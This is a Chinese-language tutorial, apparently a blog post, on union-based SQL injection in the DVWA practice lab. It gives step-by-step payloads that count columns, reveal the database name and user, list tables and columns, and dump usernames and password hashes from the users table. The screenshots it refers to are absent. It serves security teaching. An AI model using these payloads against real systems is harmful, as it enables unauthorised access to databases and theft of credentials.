判断漏洞类型
判断漏洞类型原理可参考[网络安全]SQL注入原理及常见攻击方法简析
- 判断是否为数字型注入


若为数字型注入,则第二个语句应回显Error或没有回显。
- 判断是否为字符型注入


第二个语句没有回显,所以该漏洞类型为字符型注入漏洞。
判断注入点个数
输入1' order by 4#时,回显Unknown column '4' in 'order clause'
说明猜测的注入点个数过大
输入1' order by 2#时,回显如下:
说明注入点个数为2或3
输入1' order by 3#时,回显Unknown column '3' in 'order clause'
所以注入点个数为两个
爆库名
输入1' union select 1,database()#
回显一个数据库名
图片中第一段为第一个注入点的信息,第二段为第二个注入点(即database)的信息。
爆当前用户名
输入1' union select 1,user()#

由于注入点有两个,所以我们可以通过一个sql语句既查询数据库名又查询当前用户名
输入1' union select user(),database()#

注意,如果使用1' union select user()#的话,会回显The used SELECT statements have a different number of columns(所使用的 SELECT 语句具有不同数量的列),因为该语句的注入点只有一个。
爆表名
输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
回显guestbook和users两个表名

也可采用如下语句
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

其中,group_concat的作用是将多个值连接成一个字符串,并用逗号连接。
爆列名
输入1' union select 1, column_name from information_schema.columns where table_name='users'#

或1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

相比之下,在查询结果过多的情况下,建议使用group_concat将查询结果集合起来
爆字段
输入1' union select user,password from users#

报错分析及解决方法
若SQL联合注入过程中出现该报错:illegal mix of collations for operation UNION
原因如下:information_schema里的table的排序规则是utf8_general_ci,而user表中字段默认为utf8_unicode_ci,导致字符排序不匹配。
解决方法:
1.在phpstudy中打开phpMyAdmin

2.进入dvwa数据库中的user表,将各列排序规则修改为utf8_gengeral_ci,保存即可。

本文介绍了如何判断SQL注入漏洞的类型,如数字型和字符型,并展示了如何确定注入点的数量。接着,文章详细讲解了如何通过注入技巧来爆库名、当前用户名、表名、列名以及字段。在遇到非法字符混合错误时,给出了调整数据库排序规则的解决策略。
659






